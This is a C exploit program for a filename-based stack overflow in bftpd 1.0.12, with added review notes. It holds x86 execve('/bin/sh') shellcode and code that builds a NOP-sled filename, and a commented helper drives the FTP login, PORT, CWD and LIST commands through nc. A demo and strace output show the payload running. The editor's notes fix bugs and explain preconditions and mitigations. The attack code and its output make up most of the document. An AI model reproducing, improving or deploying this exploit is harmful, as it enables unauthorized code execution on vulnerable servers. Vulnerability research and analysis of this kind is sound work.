BFTPd 1.0.12 Remote Exploit
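/*
 * =========================== BFTPd 1.0.12 Remote Exploit ===========================
 *
 * Creates a filename that triggers the overflow in bftpd 1.0.12's directory
 * listing. The name is [NOP sled][execve("/bin/sh") shellcode][ret][ret]:
 * create the file, CWD into its directory over FTP and LIST it; while the
 * server formats that entry it overruns a stack buffer and returns into the
 * sled (the ret overwrite at offset LEN is consistent with a fixed-size
 * stack buffer in the listing code; the exact buffer is not shown here).
 *
 * Coded by korty <cb@grolier.fr>
 *
 * Review notes:
 *   - Preconditions: this is a local file-creation primitive. The attacker
 *     must be able to create a file in a directory the FTP daemon will later
 *     list (an FTP account with upload rights, or a local account), and then
 *     drive PORT / CWD / LIST as list.c below does.
 *   - The default ret 0xbffffa80 is a 2001-era Linux/x86 stack guess; the
 *     optional argument is a decimal offset added to it. ASLR and a
 *     non-executable stack on any modern kernel defeat the technique.
 *   - The filename cannot contain NUL (0x00) or '/' (0x2f); the shellcode and
 *     the default ret satisfy that, and build_filename() now rejects an
 *     offset that would put such a byte into ret instead of silently
 *     producing a truncated name or a path.
 *   - The strace in section B shows the payload executing but execve()
 *     failing with ENOENT, and an earlier open("/dev/null") also failing:
 *     bftpd had chrooted into the user's home, where neither exists. A
 *     working payload for a chrooted server needs a different approach
 *     (chroot escape, or bind/connect-back that does not need /bin/sh).
 *   - ps shows the bftpd child running as user "cb", so even a successful
 *     payload yields a shell as that FTP user, not root.
 *   - Fixes versus the original: open(buf, O_CREAT) was called without a
 *     mode argument (undefined; the strace shows the file came out
 *     S_ISUID|0544), ret was stored through a misaligned int* cast, the
 *     offset was parsed with atoi(), and open() failure was not fatal.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <inttypes.h>
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>

/* Bytes of sled + shellcode before the return-address overwrite. */
#define LEN 205

/* Bytes appended after the LEN-byte body: ret twice, then NUL padding. */
#define TAIL 12

/* Default guess at the address of the NOP sled on the target's stack. */
#define DEFAULT_RET 0xbffffa80u

/*
 * Linux/x86
 *
 * toupper() evasion, standard execve() /bin/sh (used eg. in various
 * imapd exploits). Goes through a loop adding 0x20 to the
 * (/bin/sh -= 0x20) string (ie. yields /bin/sh after addition).
 * 55 bytes, contains no 0x00 and no 0x2f.
 */
static const char shellcode[] =
    /* main: */
    "\xeb\x29"                  /* jmp callz */
    /* start: */
    "\x5e"                      /* popl %esi */
    "\x29\xc9"                  /* subl %ecx, %ecx */
    "\x89\xf3"                  /* movl %esi, %ebx */
    "\x89\x5e\x08"              /* movl %ebx, 0x08(%esi) */
    "\xb1\x07"                  /* movb $0x07, %cl */
    /* loopz: */
    "\x80\x03\x20"              /* addb $0x20, (%ebx) */
    "\x43"                      /* incl %ebx */
    "\xe0\xfa"                  /* loopne loopz */
    "\x29\xc0"                  /* subl %eax, %eax */
    "\x88\x46\x07"              /* movb %al, 0x07(%esi) */
    "\x89\x46\x0c"              /* movl %eax, 0x0c(%esi) */
    "\xb0\x0b"                  /* movb $0x0b, %al */
    "\x87\xf3"                  /* xchgl %esi, %ebx */
    "\x8d\x4b\x08"              /* leal 0x08(%ebx), %ecx */
    "\x8d\x53\x0c"              /* leal 0x0c(%ebx), %edx */
    "\xcd\x80"                  /* int $0x80 */
    "\x29\xc0"                  /* subl %eax, %eax */
    "\x40"                      /* incl %eax */
    "\xcd\x80"                  /* int $0x80 */
    /* callz: */
    "\xe8\xd2\xff\xff\xff"      /* call start */
    "\x0f\x42\x49\x4e\x0f\x53\x48"; /* /bin/sh -= 0x20 */

/*
 * build_filename: fill buf with the malicious filename.
 *
 * Layout: LEN bytes of NOP sled with the shellcode right-aligned at the end,
 * then ret twice in little-endian order (the target is Linux/x86), then NUL.
 *
 * buf    destination, must hold at least LEN + TAIL bytes
 * bufsz  size of buf
 * ret    address to return into; should land somewhere in the sled
 *
 * Returns the filename length (LEN + 8), or -1 if buf is too small or if any
 * byte of ret is 0x00 or 0x2f ('/'): a NUL would truncate the name and a
 * slash would turn it into a path, so neither can be part of one filename.
 */
static int build_filename(char *buf, size_t bufsz, uint32_t ret)
{
    const size_t code_len = sizeof shellcode - 1;
    unsigned char *p;
    size_t i;

    if (buf == NULL || bufsz < LEN + TAIL)
        return -1;

    for (i = 0; i < 4; i++) {
        unsigned char b = (unsigned char)(ret >> (8 * i));
        if (b == 0x00 || b == '/')
            return -1;
    }

    memset(buf, '\x90', LEN);
    memcpy(buf + LEN - code_len, shellcode, code_len);

    /* Explicit little-endian byte stores instead of the original's
     * *(int *)(buf + LEN) = ret, which is a misaligned access. */
    p = (unsigned char *)buf + LEN;
    for (i = 0; i < 2; i++) {
        *p++ = (unsigned char)(ret);
        *p++ = (unsigned char)(ret >> 8);
        *p++ = (unsigned char)(ret >> 16);
        *p++ = (unsigned char)(ret >> 24);
    }
    memset(p, 0, TAIL - 8);     /* terminating NUL (4 bytes, as originally) */
    return LEN + 8;
}

/*
 * Usage: exploit [offset]
 *   offset  optional decimal value added to DEFAULT_RET (may be negative)
 *
 * Creates the file in the current directory. Exit status is 0 on success,
 * 1 on a bad argument, an unusable ret, or open() failure.
 */
int main(int argc, char **argv)
{
    char buf[LEN + TAIL];
    uint32_t ret = DEFAULT_RET;
    int fd;

    if (argc > 1) {
        char *end;
        long off;

        errno = 0;
        off = strtol(argv[1], &end, 10);
        if (end == argv[1] || *end != '\0' || errno == ERANGE) {
            fprintf(stderr, "usage: %s [decimal offset added to %#010" PRIx32 "]\n",
                    argv[0], DEFAULT_RET);
            return 1;
        }
        ret = ret + (uint32_t)off;      /* wraps modulo 2^32 like the original int add */
        fprintf(stderr, "Using ret %#010" PRIx32 "\n", ret);
    }

    if (build_filename(buf, sizeof buf, ret) < 0) {
        fprintf(stderr, "ret %#010" PRIx32 " contains a NUL or '/' byte; pick another offset\n",
                ret);
        return 1;
    }

    /* Explicit mode: O_CREAT without one reads garbage for the permission bits. */
    fd = open(buf, O_WRONLY | O_CREAT, 0644);
    if (fd < 0) {
        perror("buf");
        return 1;
    }
    close(fd);
    return 0;
}

/* -- BEGIN list.c --
 *
 * Feeds the FTP command sequence to the server. Run as
 *     (./list ; cat) | nc <host> 21
 * with a listener for the data connection already waiting (nc -l -p 1028).
 * PORT 127,0,0,1,4,4 selects 127.0.0.1:1028 (4*256 + 4). The "cwd longfile"
 * target is the directory exploit was run in (~/longfile in the demo, the
 * FTP user's home being its chroot).
 *
 * Notes: sleep() needs <unistd.h>. stdout is fully buffered when piped, so
 * without fflush(stdout) after each printf the sleeps do nothing and every
 * command is written at exit; it worked in the demo anyway because the server
 * reads the commands in order.
 *
 * #include <stdio.h>
 *
 * int main()
 * {
 * #define USER "cb"
 * #define PASS "PasSwoRd"
 * #define PORT "port 127,0,0,1,4,4"  // Data on the port 1028 with the addr 127.0.0.1
 * #define CWD  "cwd longfile"
 * #define LIST "list"
 *     printf("user %s\n", USER); sleep(1);
 *     printf("pass %s\n", PASS); sleep(1);
 *     printf("%s\n", PORT);      sleep(1);
 *     printf("%s\n", CWD);       sleep(1);
 *     printf("%s\n", LIST);
 * }
 * -- END list.c --
 *
 * A) DEMO
 *
 * The 213-byte filename (150 x 0x90, 55 shellcode bytes, 80 fa ff bf twice)
 * is printed by ls as octal escapes and by nc/strace as raw bytes; it is
 * abbreviated as <filename> below.
 *
 * tshaw:~/longfile$ gcc -o exploit exploit.c
 * tshaw:~/longfile$ ls
 * exploit* exploit.c list.c
 * tshaw:~/longfile$ ./exploit
 * tshaw:~/longfile$ ls
 * exploit* exploit.c list.c \220\220\220\220\220\220\220\220 (...) <filename>
 * tshaw:~/longfile$ gcc -o list list.c
 * tshaw:~/longfile$ nc -l -p 1028 &
 * [1] 29973
 * tshaw:~/longfile$ (./list ; cat) | nc localhost 21
 * 220 bftpd 1.0.12 at 127.0.0.1 ready.
 * 331 Password please.
 * 230 User logged in.
 * 200 PORT 127.0.0.1:1028 OK
 * 250 OK
 * 150 Data connection established.
 * drwxr-xr-x 2 1000 100 4096 Dec 8 04:06 .
 * drwxr-xr-x 55 1000 100 4096 Dec 8 04:02 ..
 * -rw-r--r-- 1 1000 100 323 Dec 8 04:06 list.c
 * -rwxr-xr-x 1 1000 100 11931 Dec 8 04:06 list
 * -rw-r--r-- 1 1000 100 2178 Dec 8 03:54 exploit.c
 * -rwxr-xr-x 1 1000 100 12861 Dec 8 03:56 exploit
 * -r-xr--r-- 1 1000 100 0 Dec 8 03:56 <filename>
 * [1]+ Done nc -l -p 1028
 * tshaw:~/longfile$
 *
 * B) STRACE OUTPUT
 *
 * (strace's own comment delimiters in the getdents and execve lines are
 * written as [...] here so this stays a single C comment; a doubled "}}" in
 * the bind/connect lines of the original transcript was a paste artifact.)
 *
 * tshaw:~# ps -aef |grep bftpd
 * cb 30128 62 0 Dec04 ? 00:00:00 bftpd
 * root 30136 30024 0 Dec04 ttyqa 00:00:00 grep bftpd
 * tshaw:~# strace -p 30128
 * read(0, "\n", 4096) = 1
 * socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 4
 * setsockopt(4, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
 * setsockopt(4, SOL_SOCKET, SO_SNDBUF, [65536], 4) = 0
 * bind(4, {sin_family=AF_INET, sin_port=htons(0), sin_addr=inet_addr("127.0.0.1")}, 16) = 0
 * connect(4, {sin_family=AF_INET, sin_port=htons(1028), sin_addr=inet_addr("127.0.0.1")}, 16) = 0
 * write(2, "150 Data connection established."..., 34) = 34
 * open("/dev/null", O_RDONLY|O_NONBLOCK|0x10000) = -1 ENOENT (No such file or directory)
 * stat(".", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
 * open(".", O_RDONLY|O_NONBLOCK|0x10000) = 5
 * fstat(5, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
 * fcntl(5, F_SETFD, FD_CLOEXEC) = 0
 * brk(0x8052000) = 0x8052000
 * getdents(5, [7 entries], 3933) = 328
 * stat("./.", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
 * send(4, "drwxr-xr-x 2 1000 100 "..., 58, 0) = 58
 * stat("./..", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
 * send(4, "drwxr-xr-x 55 1000 100 "..., 59, 0) = 59
 * stat("./list.c", {st_mode=S_IFREG|0644, st_size=323, ...}) = 0
 * send(4, "-rw-r--r-- 1 1000 100 "..., 63, 0) = 63
 * stat("./list", {st_mode=S_IFREG|0755, st_size=11931, ...}) = 0
 * send(4, "-rwxr-xr-x 1 1000 100 "..., 61, 0) = 61
 * stat("./exploit.c", {st_mode=S_IFREG|0644, st_size=2178, ...}) = 0
 * send(4, "-rw-r--r-- 1 1000 100 "..., 66, 0) = 66
 * stat("./exploit", {st_mode=S_IFREG|0755, st_size=12861, ...}) = 0
 * send(4, "-rwxr-xr-x 1 1000 100 "..., 64, 0) = 64
 * stat("./<filename>", {st_mode=S_IFREG|S_ISUID|0544, st_size=0, ...}) = 0
 * send(4, "-r-xr--r-- 1 1000 100 "..., 270, 0) = 270
 * execve("/bin/sh", ["/bin/sh"], [0 vars]) = -1 ENOENT (No such file or directory)
 * _exit(-1073743151) = ?
 * tshaw:~#
 *
 * Reading the trace: the 270-byte send is the 57-byte listing prefix plus
 * the 213-byte name, and the execve() that follows it is the payload running
 * inside bftpd. The S_ISUID|0544 mode is the garbage mode from the original
 * open() call, not something the exploit needs. The _exit status
 * -1073743151 is 0xbffff2d1, which appears to be ebx at the exit syscall,
 * i.e. a stack address of the payload's "/bin/sh" string; it does not match
 * the default ret, so expect to tune the offset per target.
 */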